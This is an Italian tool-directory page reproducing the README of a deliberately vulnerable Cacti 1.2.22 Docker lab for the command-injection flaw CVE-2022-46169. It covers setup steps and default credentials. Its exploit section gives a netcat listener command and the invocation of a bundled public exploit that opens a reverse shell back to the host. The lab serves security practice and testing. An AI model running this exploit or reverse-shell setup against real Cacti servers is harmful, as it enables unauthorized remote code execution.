Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cacti-rce-cve-2022-46169-vulnerable-application — AVVERTENZA: Questa è un'applicazione vulnerabile per testare lo sfruttamento dell'iniezione di comandi in Cacti (CVE-2022-46169). Eseguila a tuo rischio e pericolo! | Kitploit
Strumenti/GitHubGitHub/m3ssap0/cacti-rce-cve-2022-46169-vulnerable-application
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlLab e Pratica
GitHubm3ssap0/cacti-rce-cve-2022-46169-vulnerable-application

cacti-rce-cve-2022-46169-vulnerable-application

AVVERTENZA: Questa è un'applicazione vulnerabile per testare lo sfruttamento dell'iniezione di comandi in Cacti (CVE-2022-46169). Eseguila a tuo rischio e pericolo!

Vedi Repository
1263 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Applicazione vulnerabile di Cacti v1.2.22 con comandi injection (CVE-2022-46169)

Questa è un'applicazione vulnerabile per testare l'exploit per la vulnerabilità Cacti (CVE-2022-46169).

ATTENZIONE!

Questa applicazione contiene gravi vulnerabilità di sicurezza. Eseguila a tuo rischio! Si consiglia di utilizzare un ambiente protetto e con backup (come una VM con snapshot recente e rete solo host). Non caricare questa applicazione su server esposti su Internet, poiché verranno compromessi.

DICHIARAZIONE DI NON RESPONSABILITÀ: Non mi assumo responsabilità per il modo in cui qualcuno utilizza questa applicazione. L'unico scopo di questa applicazione è quello di essere uno scenario di test per l'exploit CVE-2022-46169 e non deve essere usata in modo dannoso. Se il tuo server viene compromesso tramite un'installazione di questa applicazione, non è mia responsabilità, ma delle persone che l'hanno caricata e installata.

Informazioni sulla vulnerabilità

  • CVE-ID: CVE-2022-46169
  • Link: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
  • Descrizione: Nelle versioni interessate, una vulnerabilità di iniezione comandi consente a un utente non autenticato di eseguire codice arbitrario su un server che esegue Cacti, se una fonte dati specifica è stata selezionata per qualsiasi dispositivo monitorato.

Utilizzo

Ecco i passaggi per configurare l'ambiente:

  1. Esegui docker compose up -d per avviare la composizione.
  2. Puoi finalizzare i passaggi navigando su http://127.0.0.1/cacti per avviare la procedura guidata di inizializzazione di Cacti. Se ottieni un errore relativo al database, attendi un attimo e aggiorna la pagina.
  3. Le credenziali predefinite sono admin/admin.
  4. Premi "Avanti" su tutti i pulsanti durante la procedura guidata, scegliendo le opzioni di conseguenza. Le impostazioni predefinite dovrebbero andare bene e tutti i prerequisiti obbligatori dovrebbero essere soddisfatti.
  5. Dopo l'installazione, devi configurare un nuovo grafico:
    1. Clicca su "Crea grafici".
    2. Nella sezione "Modelli di grafico", nel menù a tendina vicino a "Crea", seleziona: "Dispositivo - Tempo di attività".
    3. Premi il pulsante "Crea".

Il contenitore si chiamerà vuln-cacti.

Per smantellare l'ambiente usa il comando docker compose down.

La guida ufficiale all'installazione di Cacti si trova qui.

Causa principale

Una descrizione dettagliata della causa principale della vulnerabilità è disponibile qui.

Exploit

Un exploit pubblico è disponibile su Exploit-DB. Per semplicità, è stato copiato nella cartella exploit/.

Per eseguirlo:

  1. Usa netcat sulla macchina host per ascoltare connessioni in arrivo.
    nc -lvp 6669
    
  2. Avvia l'exploit.
     ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    
    Suggerimento: host.docker.internal viene utilizzato per raggiungere la macchina host dal contenitore (riferimento).

C'è anche una voce nel repository vulhub.

Autori

  • Antonio Francesco Sardella - implementazione - m3ssap0

Licenza

Questo progetto è concesso in licenza con la licenza Unlicense - vedi il file LICENSE per i dettagli.

Ringraziamenti

  • Stefan Schiller, il ricercatore di sicurezza che ha scoperto la vulnerabilità.
  • Riadh Bouchahoua, lo sviluppatore dell'exploit.
Scarica lo strumento